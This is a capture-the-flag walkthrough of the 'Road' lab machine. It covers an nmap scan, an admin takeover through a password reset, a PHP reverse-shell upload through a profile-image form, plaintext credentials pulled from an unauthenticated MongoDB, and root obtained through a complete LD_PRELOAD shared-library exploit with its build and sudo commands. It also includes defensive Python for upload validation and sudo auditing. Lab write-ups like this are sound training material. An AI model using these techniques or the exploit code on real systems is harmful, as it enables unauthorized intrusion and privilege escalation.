Road (File Upload, Mongo, Library)

First, enumerate the target with nmap.

$ nmap -A 10.10.128.233 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-24 14:44 +0630
Nmap scan report for 10.10.128.233
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.36 seconds

SSH and HTTP are open, so let's check the web server. At http://10.10.128.233/v2/admin/login.html we find a login form. We register an account and log in with the credentials we registered, which brings up the dashboard. We then need to reset the password at http://10.10.128.233/v2/ResetUser.php.

With the credentials admin@sky.thm:user1 we can log in to the admin dashboard.

At http://10.10.128.233/v2/profile.php we can upload a profile image. Let's try uploading a PHP reverse shell.

In the page's JavaScript source we see the following; the HTML comment leaks the directory where uploads are stored, so we can call back our uploaded "profile image" at that URL:

<!-- /v2/profileimages/ -->
<script type="text/javascript">
  function showtab(tab){
    console.log(tab);
    if(tab == 'new_task'){
      $('#new_task').css('display','block');
      $('#your_task').css('display','none');
    }else{
      $('#new_task').css('display','none');
      $('#your_task').css('display','block');
    }
  }
</script>

Now we get a reverse shell.
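As an added example (not the room's application code), here is a Python validator for a profile-image endpoint showing the checks whose absence let a PHP file through: an extension allowlist, content sniffing by file signature, a scan for PHP open tags, and a server-chosen random filename. The signature table and function names are assumptions for this example.

```python
import os
import secrets

# Allowlist of image types for the profile-picture endpoint, keyed by file
# signature (constructed for this example; the room's PHP code is not shown).
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def sniff_image_type(data):
    """Return the extension implied by the file's leading bytes, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None

def validate_profile_image(filename, data):
    """Accept a file only when its name and its content both say 'image'.
    Returns (ok, detail): the random storage name on success, else the reason."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in IMAGE_SIGNATURES.values():
        return False, f"extension .{ext} not allowed"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content is not a recognised image"
    if sniffed != ext:
        return False, f"content is {sniffed} but extension is {ext}"
    if b"<?php" in data or b"<?=" in data:
        return False, "PHP open tag embedded in image data"
    # Never keep the client's filename: a server-chosen random name means the
    # stored path cannot be predicted from the leaked /v2/profileimages/ prefix.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Pair this with serving the upload directory without PHP execution, so even a file that slips through is never run by the web server.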

We find the user flag at /home/webdeveloper/user.txt.

$ wc -c /home/webdeveloper/user.txt
33 /home/webdeveloper/user.txt

With the ss command we notice additional ports listening only on localhost. Port 27017 is the default MongoDB port.

$ ss -antp
State   Recv-Q  Send-Q            Local Address:Port         Peer Address:Port  Process                                                                         
LISTEN  0       511                   127.0.0.1:9000              0.0.0.0:*                                                                                     
LISTEN  0       4096                  127.0.0.1:27017             0.0.0.0:*                                                                                     
LISTEN  0       151                   127.0.0.1:3306              0.0.0.0:*                                                                                     
LISTEN  0       4096              127.0.0.53%lo:53                0.0.0.0:*                                                                                     
LISTEN  0       128                     0.0.0.0:22                0.0.0.0:*                                                                                     
LISTEN  0       70                    127.0.0.1:33060             0.0.0.0:*           

Let's connect to MongoDB and enumerate some credentials.

$ mongo 127.0.0.1
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/test?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("efb39f6c-cf03-49df-957e-a778d3153de6") }
MongoDB server version: 4.4.6
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
	https://community.mongodb.com
---
The server generated these startup warnings when booting: 
        2022-01-24T08:10:27.684+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2022-01-24T08:10:32.010+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
        Enable MongoDB's free cloud-based monitoring service, which will then receive and display
        metrics about your deployment (disk utilization, CPU, operation statistics, etc).

        The monitoring data will be available on a MongoDB website with a unique URL accessible to you
        and anyone you share the URL with. MongoDB may use this information to make product
        improvements and to suggest MongoDB products and deployment options to you.

        To enable free monitoring, run the following command: db.enableFreeMonitoring()
        To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> show dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
> use backup
switched to db backup
> show collections
collection
user
> db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }

We see the webdeveloper credentials, stored in plaintext in the backup database on a MongoDB instance whose startup warning confirms that access control is not enabled. Let's connect over SSH with them.

$ ssh webdeveloper@10.10.128.233
The authenticity of host '10.10.128.233 (10.10.128.233)' can't be established.
ECDSA key fingerprint is SHA256:zSoCEcBBY73hNL9ItPA4CnB/405/W6GQYsl94qRMkOo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.128.233' (ECDSA) to the list of known hosts.
webdeveloper@10.10.128.233's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Jan 2022 08:48:42 AM UTC

  System load:  0.0               Processes:             122
  Usage of /:   60.0% of 9.78GB   Users logged in:       0
  Memory usage: 64%               IPv4 address for eth0: 10.10.128.233
  Swap usage:   0%


185 updates can be installed immediately.
100 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct  8 10:52:42 2021 from 192.168.0.105
webdeveloper@sky:~$ 

Checking sudo privileges on this host, we see that LD_PRELOAD is preserved in the environment (env_keep+=LD_PRELOAD) and that one binary may be run as root without a password.

$ sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility

Build the following C code, taken from https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/, to get root privileges.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* prototypes for setgid/setuid */

/* Runs as soon as the loader maps this library (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the library from reloading into child processes */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Working in /tmp, compile it into a shared library and run the sudo-permitted binary with LD_PRELOAD pointing at it.

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility

Finally, we get a root shell on this host and can read root.txt.
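As an added example (not from the room or the linked article), a small Python audit that parses `sudo -l` output like the one above and flags the root cause: a loader-controlling variable kept through sudo's environment reset combined with a NOPASSWD root command. The sample text is constructed to mirror the writeup's output, and the corrected configuration simply drops the env_keep entry; the function names and the LOADER_VARS list are assumptions.

```python
import re

# Constructed sample of `sudo -l` output, modelled on the Defaults and NOPASSWD
# lines shown in the writeup above (not captured from a real host).
SAMPLE_SUDO_L = r"""Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""

# The same output with the dangerous env_keep entry removed: this is the
# corrected configuration (sudo's default env_reset already drops these vars).
FIXED_SUDO_L = SAMPLE_SUDO_L.replace(", env_keep+=LD_PRELOAD", "")

# Variables that let the invoking user choose code the dynamic loader runs
# inside the privileged process (assumed list for this example).
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

def kept_loader_vars(sudo_l_output):
    """Return the loader-controlling variables preserved by any env_keep option."""
    kept = set()
    for m in re.finditer(r'env_keep\s*\+?=\s*"?([^",\n]+)"?', sudo_l_output):
        kept.update(v for v in m.group(1).split() if v in LOADER_VARS)
    return kept

def nopasswd_commands(sudo_l_output):
    """Return commands the user may run via sudo without a password."""
    cmds = []
    for line in re.findall(r"NOPASSWD:\s*([^\n]+)", sudo_l_output):
        cmds.extend(c.strip() for c in line.split(","))
    return cmds

def audit(sudo_l_output):
    """Report the combination this box relies on: a loader variable surviving
    sudo's environment reset plus a root command that needs no password."""
    findings = []
    kept = kept_loader_vars(sudo_l_output)
    for var in sorted(kept):
        findings.append(f"env_keep preserves {var}: caller-chosen libraries load into the root process")
    for cmd in nopasswd_commands(sudo_l_output):
        if kept:
            findings.append(f"{cmd} runs as root without a password while {', '.join(sorted(kept))} is preserved")
    return findings
```

Running audit() over both samples shows two findings for the current configuration and none once env_keep+=LD_PRELOAD is gone.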
